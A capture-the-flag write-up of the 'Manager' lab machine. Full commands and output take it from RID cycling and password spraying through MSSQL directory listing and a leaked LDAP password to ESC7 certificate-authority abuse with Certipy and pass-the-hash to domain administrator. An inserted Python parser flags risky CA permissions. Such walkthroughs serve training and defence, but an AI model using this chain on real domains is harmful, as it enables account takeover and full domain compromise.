
Enumeration
Nmap
We’ll use Nmap to scan the remote host and check for any open ports.
ports=$(nmap -p- --min-rate=1000 -T4 10.129.235.134 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.129.235.134 -oN nmap_tcp -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Manager
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-09 15:20:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
|_SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
|_ssl-date: 2025-09-09T15:22:28+00:00; +7h00m51s from scanner time.
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
|_SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
|_ssl-date: 2025-09-09T15:22:27+00:00; +7h00m50s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-09-09T15:22:28+00:00; +7h00m51s from scanner time.
| ms-sql-info:
| 10.129.235.134:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-09T15:10:54
| Not valid after: 2055-09-09T15:10:54
| MD5: d180:ef3e:9a36:78fe:5a0f:44f5:fa37:301d
|_SHA-1: be6e:f7b3:9128:02ad:50df:3e19:5912:a27d:d20b:d273
| ms-sql-ntlm-info:
| 10.129.235.134:1433:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-09T15:22:28+00:00; +7h00m51s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
|_SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-09T15:22:27+00:00; +7h00m50s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
|_SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49667/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
49723/tcp open msrpc Microsoft Windows RPC
49734/tcp filtered unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m50s, deviation: 0s, median: 7h00m50s
| smb2-time:
| date: 2025-09-09T15:21:50
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
The Nmap scan shows multiple open ports, including those usually associated with domain controller services, a web server on port 80, an SMB service on port 445, and an SQL server on port 1433.
We also observe that the domain name is manager.htb, so we’ll add this entry to our /etc/hosts file.
echo "10.129.235.134 manager.htb" | sudo tee -a /etc/hosts
HTTP
When we visit port 80 in the browser, we find a static website that appears to have very limited functionality.

SMB
We’ll enumerate the SMB shares with the smbclient tool, attempting to list all available shares through a null session.
└──╼ [★]$ smbclient -L \\\\10.129.235.134 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.235.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
The listed SMB shares don’t provide anything useful. However, since null sessions are allowed, we can attempt RID cycling to enumerate users.
RID cycling works by incrementally querying the RID portion of Windows SIDs, which are assigned sequentially to users and groups. This can reveal valid accounts.
To do this, we use the lookupsid module from the Impacket toolkit.
└──╼ [★]$ impacket-lookupsid anonymous@manager.htb -no-pass
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at manager.htb
[*] StringBinding ncacn_np:manager.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: MANAGER\Administrator (SidTypeUser)
501: MANAGER\Guest (SidTypeUser)
502: MANAGER\krbtgt (SidTypeUser)
<SNIP>
1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
1113: MANAGER\Zhong (SidTypeUser)
1114: MANAGER\Cheng (SidTypeUser)
1115: MANAGER\Ryan (SidTypeUser)
1116: MANAGER\Raven (SidTypeUser)
1117: MANAGER\JinWoo (SidTypeUser)
1118: MANAGER\ChinHae (SidTypeUser)
1119: MANAGER\Operator (SidTypeUser)
We extract only the SidTypeUser entries and save them into a file called usernames.txt.
└──╼ [★]$ cat usernames.txt
administrator
zhong
cheng
ryan
raven
jinwoo
chinHae
operator
It is fairly common for users to set their password the same as their username. With that in mind, we’ll try a password spraying attack using the simple username = password pattern.
We can use netexec to attempt SMB authentication against the target.
└──╼ [★]$ nxc smb 10.129.235.134 -u usernames.txt -p usernames.txt --no-bruteforce
SMB 10.129.235.134 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.129.235.134 445 DC01 [-] manager.htb\administrator:administrator STATUS_LOGON_FAILURE
SMB 10.129.235.134 445 DC01 [-] manager.htb\zhong:zhong STATUS_LOGON_FAILURE
SMB 10.129.235.134 445 DC01 [-] manager.htb\cheng:cheng STATUS_LOGON_FAILURE
SMB 10.129.235.134 445 DC01 [-] manager.htb\ryan:ryan STATUS_LOGON_FAILURE
SMB 10.129.235.134 445 DC01 [-] manager.htb\raven:raven STATUS_LOGON_FAILURE
SMB 10.129.235.134 445 DC01 [-] manager.htb\jinwoo:jinwoo STATUS_LOGON_FAILURE
SMB 10.129.235.134 445 DC01 [-] manager.htb\chinHae:chinHae STATUS_LOGON_FAILURE
SMB 10.129.235.134 445 DC01 [+] manager.htb\operator:operator
We now have the password for operator.
Foothold
We’ll try connecting to the MSSQL Server, as it might provide us with some access to the filesystem. This can be done using the mssqlclient module from the Impacket toolkit.
└──╼ [★]$ impacket-mssqlclient manager/operator:operator@manager.htb -windows-auth
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (MANAGER\Operator guest@master)>
We can use the xp_dirtree stored procedure to explore the filesystem and list directory contents.
SQL (MANAGER\Operator guest@master)> xp_dirtree \
subdirectory depth file
------------------------- ----- ----
$Recycle.Bin 1 0
Documents and Settings 1 0
inetpub 1 0
PerfLogs 1 0
Program Files 1 0
Program Files (x86) 1 0
ProgramData 1 0
Recovery 1 0
SQL2019 1 0
System Volume Information 1 0
Users 1 0
Windows 1 0
We’ll have a look through the web root at /inetpub/wwwroot to see what’s inside.
SQL (MANAGER\Operator guest@master)> xp_dirtree \inetpub\wwwroot
subdirectory depth file
------------------------------- ----- ----
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1
Here we find an intriguing file, website-backup-27-07-23-old.zip, which looks to be a backup of the site. Since it’s stored in the web root, we should be able to download it.
wget http://10.129.235.134/website-backup-27-07-23-old.zip
After extracting the backup, we discover a hidden file named .old-conf.xml.
unzip website-backup-27-07-23-old.zip -d website
cd website
└──╼ [★]$ ls -la
total 68
drwxr-xr-x 5 knuckl3s knuckl3s 4096 Sep 9 03:51 .
drwxr-xr-x 6 knuckl3s knuckl3s 4096 Sep 9 03:51 ..
-rw-r--r-- 1 knuckl3s knuckl3s 5386 Jul 27 2023 about.html
-rw-r--r-- 1 knuckl3s knuckl3s 5317 Jul 27 2023 contact.html
drwxr-xr-x 2 knuckl3s knuckl3s 4096 Sep 9 03:51 css
drwxr-xr-x 2 knuckl3s knuckl3s 4096 Sep 9 03:51 images
-rw-r--r-- 1 knuckl3s knuckl3s 18203 Jul 27 2023 index.html
drwxr-xr-x 2 knuckl3s knuckl3s 4096 Sep 9 03:51 js
-rw-r--r-- 1 knuckl3s knuckl3s 698 Jul 27 2023 .old-conf.xml
-rw-r--r-- 1 knuckl3s knuckl3s 7900 Jul 27 2023 service.html
The .old-conf.xml file reveals the password for the Raven user.
└──╼ [★]$ cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
<access-user>
<user>raven@manager.htb</user>
<password>R4v3n<SNIP></password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>
We use netexec to validate the credentials and check whether they allow access through WinRM.
└──╼ [★]$ nxc winrm 10.129.235.134 -u raven -p 'R4v3n<SNIP>'
WINRM 10.129.235.134 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
WINRM 10.129.235.134 5985 DC01 [+] manager.htb\raven:R4v3n<SNIP> (Pwn3d!)
We connect to the target using Evil-WinRM.
└──╼ [★]$ evil-winrm -i 10.129.235.134 -u raven -p 'R4v3n<SNIP>'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents>
The user flag is located in Raven’s Desktop:
*Evil-WinRM* PS C:\Users\Raven\Desktop> cat user.txt
192a<SNIP>f0dc
Privilege Escalation
We’ll check the Certification Authority for possible misconfigurations and use Certipy to uncover any vulnerabilities.
Follow the setup guide to install Certipy. Depending on your environment, you might need to use the command certipy-ad instead of certipy.
└──╼ [★]$ certipy find -u raven -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates
The report shows that the user Raven has risky permissions, specifically ManageCA rights on the Certification Authority. This means we can potentially abuse the ESC7 scenario to escalate privileges to Domain Admin while acting as Raven.
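As an added illustration (not part of the original writeup or of Certipy itself), the following Python parses the Access Rights block of a certipy find report and flags any principal outside the built-in admin groups that holds ManageCa or ManageCertificates, which is the ESC7 condition a defender should audit for. The sample report is constructed from the output above, and the allowlist of admin groups is an assumption.

```python
# Constructed sample, modelled on the Certificate Authorities section of certipy find output.
SAMPLE = """\
Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Permissions
      Owner                             : MANAGER.HTB\\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\\Operator
                                          MANAGER.HTB\\Authenticated Users
                                          MANAGER.HTB\\Raven
        ManageCertificates              : MANAGER.HTB\\Administrators
                                          MANAGER.HTB\\Domain Admins
                                          MANAGER.HTB\\Enterprise Admins
        ManageCa                        : MANAGER.HTB\\Administrators
                                          MANAGER.HTB\\Domain Admins
                                          MANAGER.HTB\\Enterprise Admins
                                          MANAGER.HTB\\Raven
[!] Vulnerabilities
  ESC7                                  : 'MANAGER.HTB\\\\Raven' has dangerous permissions
"""

# Assumption: only these groups should ever hold CA management rights.
EXPECTED_ADMINS = {"administrators", "domain admins", "enterprise admins"}
# Either right lets the holder approve pending requests or change CA settings.
DANGEROUS_RIGHTS = ("ManageCa", "ManageCertificates")


def parse_access_rights(text):
    """Return {right_name: [principal, ...]} from the 'Access Rights' block."""
    rights, current, in_block = {}, None, False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Access Rights":
            in_block = True
            continue
        if not in_block or not line:
            continue
        # The block ends at the vulnerability summary or the templates section.
        if line.startswith("[!]") or line.startswith("Certificate Templates"):
            break
        if " : " in line:
            # "Right : first principal" opens a new right.
            name, principal = (p.strip() for p in line.split(" : ", 1))
            current = name
            rights[current] = [principal]
        elif current is not None:
            # Indented continuation lines are further principals of the same right.
            rights[current].append(line)
    return rights


def find_esc7(text):
    """Return sorted (right, principal) pairs for non-admin holders of CA management rights."""
    findings = set()
    for right, principals in parse_access_rights(text).items():
        if right not in DANGEROUS_RIGHTS:
            continue
        for principal in principals:
            account = principal.split("\\", 1)[-1].lower()  # drop the DOMAIN\ prefix
            if account not in EXPECTED_ADMINS:
                findings.add((right, principal))
    return sorted(findings)
```

Run find_esc7 over a saved certipy find -stdout report to get the same ESC7 finding Certipy reports, plus any non-admin ManageCertificates holders, which Certipy groups under the same heading.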
To move forward, we’ll first add Raven as an officer, which will allow us to manage and manually issue certificates.
└──╼ [★]$ certipy ca -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -add-officer raven -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.129.235.134:636 - ssl
[+] Default path: DC=manager,DC=htb
[+] Configuration path: CN=Configuration,DC=manager,DC=htb
[+] Trying to get DCOM connection for: 10.129.235.134
[*] Successfully added officer 'Raven' on 'manager-dc01-ca'
Now that we’ve been added as an officer, we can both issue and manage certificates. Using the -enable-template flag, we can enable the SubCA template on the CA.
└──╼ [★]$ certipy ca -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -enable-template subca
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-dc01-ca'
We can view the enabled certificate templates by running the command with the -list-templates flag.
└──╼ [★]$ certipy ca -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -list-templates
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Enabled certificate templates on 'manager-dc01-ca':
SubCA
DirectoryEmailReplication
DomainControllerAuthentication
KerberosAuthentication
EFSRecovery
EFS
DomainController
WebServer
Machine
User
Administrator
With the prerequisites in place (having Manage Certificates rights via ManageCA and confirming the SubCA template is enabled), we can now request a certificate using the SubCA template.
Although this request will be denied, it will still generate a request ID and a private key, which we then save to a file.
└──╼ [★]$ certipy req -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -template SubCA -upn administrator@manager.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 19
Would you like to save the private key? (y/N) y
[*] Saved private key to 19.key
[-] Failed to request certificate
We see that the certificate request ID is 19. Using our granted permissions, we can now manually issue the previously failed certificate with the ca command and the -issue-request <request ID> parameter.
└──╼ [★]$ certipy ca -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -issue-request 19
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[-] Got access denied trying to issue certificate
If you encounter [-] Got access denied trying to issue certificate, rerun the command that added Raven as an officer. The cleanup scripts on the box may have reverted the permissions to their original state.
└──╼ [★]$ certipy ca -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -add-officer raven -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.129.235.134:636 - ssl
[+] Default path: DC=manager,DC=htb
[+] Configuration path: CN=Configuration,DC=manager,DC=htb
[+] Trying to get DCOM connection for: 10.129.235.134
[*] Successfully added officer 'Raven' on 'manager-dc01-ca'
└──╼ [★]$ certipy ca -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -issue-request 19
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
We can fetch the issued certificate using the req command along with the -retrieve <request ID> parameter.
└──╼ [★]$ certipy req -u raven@manager.htb -p 'R4v3n<SNIP>' -dc-ip 10.129.235.134 -ca manager-dc01-ca -retrieve 19
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 19
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '19.key'
[*] Saved certificate and private key to 'administrator.pfx'
With the administrator’s PFX file, we can now use it for authentication. However, running the auth command gives the error KRB_AP_ERR_SKEW (Clock skew too great).
This happens when the time on our machine is out of sync with the KDC (the domain controller), which breaks Kerberos authentication; the Nmap scan already reported a clock skew of about 7 hours. To fix it, we need to turn off Automatic Date & Time on our system and manually sync the clock by running the following command:
sudo ntpdate -s manager.htb
Re-running the command now works as expected and successfully dumps the administrator hash.
└──╼ [★]$ certipy auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3<SNIP>04ee:ae50<SNIP>24ef
We use the administrator’s hash to log in via Evil-WinRM and successfully capture the root flag from the system.
└──╼ [★]$ evil-winrm -i manager.htb -u administrator -H ae50<SNIP>24ef
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
839b<SNIP>4e88